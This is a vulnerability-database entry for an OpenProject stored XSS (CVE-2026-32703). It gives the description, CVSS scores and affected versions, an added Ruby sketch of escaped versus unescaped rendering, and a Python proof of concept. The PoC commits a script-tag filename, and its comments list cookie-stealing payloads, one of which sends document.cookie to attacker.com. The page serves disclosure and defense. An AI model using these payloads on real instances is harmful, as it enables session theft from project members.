Security Vulnerability Report

CVE-2026-32703 CVSS 9.0 CRITICAL

Published: 2026-03-18 22:16:25
Last Modified: 2026-03-19 19:23:01

Description

OpenProject is an open-source, web-based project management software. In versions prior to 16.6.9, 17.0.6, 17.1.3, and 17.2.1, the Repositories module did not properly escape filenames displayed from repositories. This allowed an attacker with push access to the repository to create commits with filenames that included HTML code, which was injected into the page without proper sanitization. This allowed a persistent XSS attack against all members of the project who accessed the repositories page to display a changeset in which the maliciously crafted file was deleted. Versions 16.6.9, 17.0.6, 17.1.3, and 17.2.1 fix the issue.
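Added example (not OpenProject's code and not part of the page's PoC): a Ruby sketch of the bug class, showing a changeset view that interpolates Git filenames into HTML unescaped beside the escaped version, plus a hypothetical audit helper that flags filenames carrying HTML metacharacters; the filenames are constructed samples.

```ruby
# Added example (not OpenProject's code): the bug class behind CVE-2026-32703.
# A changeset view lists filenames taken straight from Git. If the view
# interpolates them into HTML without escaping, a filename chosen by anyone
# with push access becomes markup (stored XSS). The fix is output encoding.
require "erb"

# Constructed sample: filenames as they might appear in a changeset listing.
# One of them is crafted to contain a script tag.
SAMPLE_FILENAMES = [
  "README.md",
  "docs/<script>alert(1)</script>.txt",
  "src/main.rb"
].freeze

# Vulnerable rendering: raw string interpolation into the HTML template.
def render_changeset_unescaped(filenames)
  rows = filenames.map { |name| "<li class=\"deleted\">#{name}</li>" }
  "<ul>#{rows.join}</ul>"
end

# Hardened rendering: every untrusted value passes through html_escape
# before it reaches the template, so '<' becomes '&lt;' and so on.
def render_changeset_escaped(filenames)
  rows = filenames.map do |name|
    "<li class=\"deleted\">#{ERB::Util.html_escape(name)}</li>"
  end
  "<ul>#{rows.join}</ul>"
end

# Defender-side check (hypothetical helper): flag filenames carrying HTML
# metacharacters so a pre-receive hook or audit job can hold them for review.
HTML_META = /[<>"'&]/

def suspicious_filenames(filenames)
  filenames.select { |name| name.match?(HTML_META) }
end

if __FILE__ == $PROGRAM_NAME
  puts render_changeset_unescaped(SAMPLE_FILENAMES)
  puts render_changeset_escaped(SAMPLE_FILENAMES)
  p suspicious_filenames(SAMPLE_FILENAMES)
end
```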

CVSS Details

CVSS Score: 9.0 (secondary score, from the vendor advisory source)
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
NVD primary score: 5.4 MEDIUM (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)
Weakness: CWE-79 (Improper Neutralization of Input During Web Page Generation, 'Cross-site Scripting')

Configurations (Affected Products)

cpe:2.3:a:openproject:openproject:*:*:*:*:*:*:*:* (versions before 16.6.9) - VULNERABLE
cpe:2.3:a:openproject:openproject:*:*:*:*:*:*:*:* (17.0.0 up to and excluding 17.0.6) - VULNERABLE
cpe:2.3:a:openproject:openproject:*:*:*:*:*:*:*:* (17.1.0 up to and excluding 17.1.3) - VULNERABLE
cpe:2.3:a:openproject:openproject:17.2.0:*:*:*:*:*:*:* - VULNERABLE

Affected ranges:
OpenProject < 16.6.9
OpenProject 17.0.x < 17.0.6
OpenProject 17.1.x < 17.1.3
OpenProject 17.2.0 (fixed in 17.2.1)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2026-32703 PoC - OpenProject Stored XSS via Repository Filename
# Requires: Git, access to push to OpenProject repository
import subprocess
import sys


def exploit():
    """
    This PoC demonstrates how an attacker with push access can inject
    malicious JavaScript through a specially crafted filename in a Git commit.
    """
    # Malicious filename containing XSS payload
    malicious_filename = '<script>alert(String.fromCharCode(88,83,83))</script>.txt'

    # Alternative payloads that could be used:
    # <img src=x onerror=alert(document.cookie)> - Steal cookies
    # <svg/onload=fetch('https://attacker.com/?c='+document.cookie)> - Exfiltrate data
    # <iframe src="javascript:alert(document.domain)"> - Domain disclosure

    commands = [
        # Initialize a git repo for testing (in real scenario, clone existing repo)
        "git init",
        "git config user.email '[email protected]'",
        "git config user.name 'Attacker'",
        # Create the malicious file with XSS payload in filename
        f"touch '{malicious_filename}'",
        f"git add '{malicious_filename}'",
        # Commit the malicious file
        "git commit -m 'Add documentation file'",
        # Display the malicious commit
        "git log --oneline -1",
    ]

    print("[*] CVE-2026-32703 OpenProject Stored XSS PoC")
    print("[*] This PoC creates a commit with XSS payload in filename")
    print(f"[*] Malicious filename: {malicious_filename}")
    print("[*] When this file is displayed in OpenProject repositories page,")
    print("[*] the script tag will execute in victim's browser.")

    for cmd in commands:
        print(f"\n[+] Executing: {cmd}")
        result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
        if result.stdout:
            print(result.stdout)
        if result.stderr:
            print(result.stderr, file=sys.stderr)

    print("\n[!] In real attack scenario:")
    print("[!] 1. Push this commit to target OpenProject repository")
    print("[!] 2. Wait for victims to view the repository page")
    print("[!] 3. XSS payload executes in victim's browser")


if __name__ == '__main__':
    exploit()
```

References

https://github.com/opf/openproject/security/advisories/GHSA-p423-72h4-fjvp (Vendor Advisory)
